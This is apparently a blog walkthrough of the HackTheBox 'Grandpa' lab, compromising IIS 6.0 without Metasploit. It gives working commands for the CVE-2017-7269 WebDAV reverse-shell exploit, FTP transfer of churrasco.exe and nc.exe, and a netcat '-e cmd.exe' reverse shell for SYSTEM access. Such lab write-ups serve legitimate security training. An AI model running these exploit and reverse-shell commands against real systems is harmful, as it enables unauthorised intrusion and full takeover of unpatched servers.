HTB: Walkthrough without Metasploit. ~[GRANDPA]

Akash Pawar
4 min readApr 8, 2020

--

IIS 6.0 privilege escalation using impersonation

machine IP: 10.10.10.14

1. Scanning and Enumeration-

doing a basic scan with Nmap will give below results

we can see many HTTP methods that are open one of which is PUT which can allow us to upload a shell.

visiting the IP we can see there is a default page.

check for PUT upload vulnerabilities, we will be using a tool DAVTEST which is there in Kali Linuxdavtest -url http://10.10.10.14

we failed to do, the PUT method is getting failed to upload the shell.
use searchsploit and find any exploit for the IISroot@kali:~# searchsploit IIS 6.0
using Microsoft IIS 6.0 — WebDAV ‘ScStoragePathFromUrl’ Remote Buffer Overflow exploit (https://exploit-db.com/exploits/41738 )

root@kali:~# searchsploit -m 41738//the -m allows copying exploit in the current directory, checking CVE for this exploit we will look on google for CVE-2017–7269 and now looking and google for exploit “CVE-2017–7269 exploit Github” and download below exploit.

root@kali:~# wget https://raw.githubusercontent.com/g0rx/iis6-exploit-2017-CVE-2017-7269/master/iis6%20reverse%20shell
rename the exploit
root@kali:~# mv iis6\ reverse\ shell exploit.py

2. Gaining Initial Access-

using Netcat to create a listener at 1234
root@kali:~# nc -nlvp 1234

Now run the exploit using python
root@kali:~/hackthebox/07-Grandpa# python exploit.py 10.10.10.14 80 10.10.14.7 1234

NOTE — (we got the shell, if the exploit is not working simply try to rest machine and try again…) — in my case resetting the machine helped

here we got the shell but we don’t have privileges to access any of user, because we don’t have privileges

3. Privileges escalation-

Mostly we use for windows i.e Windows-Exploit-Suggester

root@kali:~# python windows-exploit-suggester.py --database 2020-04-04-mssb.xls --systeminfo ~/hackthebox/07-Grandpa/systeminfo.txt

we have got many exploits, I have tried all of them and failed but as I already said I want to solve without Metasploit, so if you want to try you can download compiled binaries of all exploits from here and give it a try.
https://github.com/SecWiki/windows-kernel-exploits/

Windows Server 2003 and IIS 6.0 privilege escalation using impersonation:
for more detail, you can check this blog- Link

Let’s download the exploit binary and copy nc.exe both on the same location

root@kali:~/hackthebox/07-Grandpa# wget https://github.com/Re4son/Churrasco/blob/master/churrasco.exe?raw=true

rename the binary mv churrasco.exe\?raw\=true churrasco.exe

root@kali:~/hackthebox/07-Grandpa# cp /usr/share/windows-resources/binaries/nc.exe .

Now on the Box, we need to upload our binary, I tried with PowerShell, but it’s not available there so we will use FTP to download, before start the FTP server using python on kali, see now we have to do file transfer so we are going to use FTP so let’s start FTP server -.

root@kali:~/hackthebox/07-Grandpa# python -m pyftpdlib -p 21

On Box, we need a directory so that we can write some files there go to

C:\>cd wmpub

C:\wmpub>echo open 10.10.14.7 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET churrasco.exe >> ftp.txt&echo bye>> ftp.txt

creating a file ftp.txt which will have commands to download churrasco.exe

C:\wmpub>ftp -v -n -s:ftp.txt

C:\wmpub>echo open 10.10.14.7 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET nc.exe >> ftp.txt&echo bye>> ftp.txt

creating a file ftp.txt which will have commands to download nc.exe

C:\wmpub>ftp -v -n -s:ftp.txt

checking the FTP server

Here we can see both binaries go downloaded from FTP server

and on the shell, we can see got both the binaries

create a Listener on port 7777 for churrasco.exe to create a reverse connection with our host nc -nlvp 7777

and now execute the binary
churrasco.exe -d "C:\wmpub\nc.exe 10.10.14.7 7777 -e cmd.exe"

now check the listener and here you got the system access

Thanks to Rana Khalil — Inspired by her Journey!
Thanks to MrNmap — for the blog of Windows Privilege Escalation via Token Kidnapping

--

--